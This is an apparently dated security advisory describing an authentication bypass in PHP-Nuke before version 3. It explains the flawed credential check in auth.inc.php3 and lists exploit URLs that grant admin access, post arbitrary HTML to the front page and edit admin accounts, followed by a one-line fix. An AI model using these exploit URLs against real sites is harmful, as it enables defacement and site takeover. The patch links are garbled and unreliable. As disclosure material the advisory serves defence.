COMMAND

    PHP-Nuke

SYSTEMS AFFECTED

    all sites using PHP-Nuke, versions less than 3

PROBLEM

    Gandalf Elbrujo,  Gandalf found  following.    PHP-Nuke is  a  Web
    Portal System,  storytelling software  also an  automated web site
    to distribute news and articles with users system.

    The problem is when somebody does a

        http://example.com/admin.php3?admin=whatever

    can have full access as an admin, that means posting news, and all
    that the actual administrator can do.

    So, lets see why this is posible, file auth.inc.php3, wich is used
    to authentificate the admin:

        <----snip---->
        if(isset($admin)) {
          if(!IsSet($mainfile)) { include("mainfile.php3"); }
          $admin = base64_decode($admin);
          $admin = explode(":", $admin); <--- between this line and the above
        $admin becomes null
          $aid = "$admin[0]";  <--- $aid
          $pwd = "$admin[1]";  <--- $pwd = so this two also are null
        <---snip--->
          $result=mysql_query("select pwd from authors where aid='$aid'");
        //  ^^^this becomes: select pwd from authors where aid=''; wich returns nothing
        <--snip--->
          } else {
            list($pass)=mysql_fetch_row($result); <---- $pass is gets null here
                if($pass == $pwd) { <-- so this translate to NULL == NULL
                $admintest = 1; <--- bingo! we're admin now!
	        }
        <---snip--->

    Starman Jones added following.   The above example lets you  login
    as the administrator.   But you cannot  do anything with  that url
    alone.  When you click on anything in the administrator's  control
    panel you  get asked  for a  username and  password.   Satrman has
    found a way to bypass this.

        http://www.example.com/admin.php3?admin=anything&op=PostAdminStory&introtext=evil%20hacker%20message

    The Above example  lets you post  a topic on  the main page  as an
    administrator.  You  can add html  tags to it.   And a topic.   To
    seperate the text  you want to  display you use  '%20' without the
    ''.  You  could also put  html in the  message and make  the whole
    front page redirect to some other page.  Anyway you get the idea.

    You can also edit the existing admin accounts by doing:

        http://www.example.com/admin.php3?admin=anything&op=mod_authors

    With &op= whatever is in  teh administration menu you can  control
    everything that it lets you.

SOLUTION

    Author  added  fix  to  the  last  version that came out days ago.
    For thouse that doesnt want to download the latest version, at

        http://http://www.ncc.org.ve/php-nuke.php3

    heres a quick fix:  File auth.inc.php3 line 37 add,

         if($aid=="" || $pwd=="") exit;

    The patch for bug reported by Starman is available at:

        http://www.ncc.org.we/php-nuke.php3?op=download&location=http://download.sourceforge.net/phpnuke&file=PHP-Nuke-3.0.tar.gz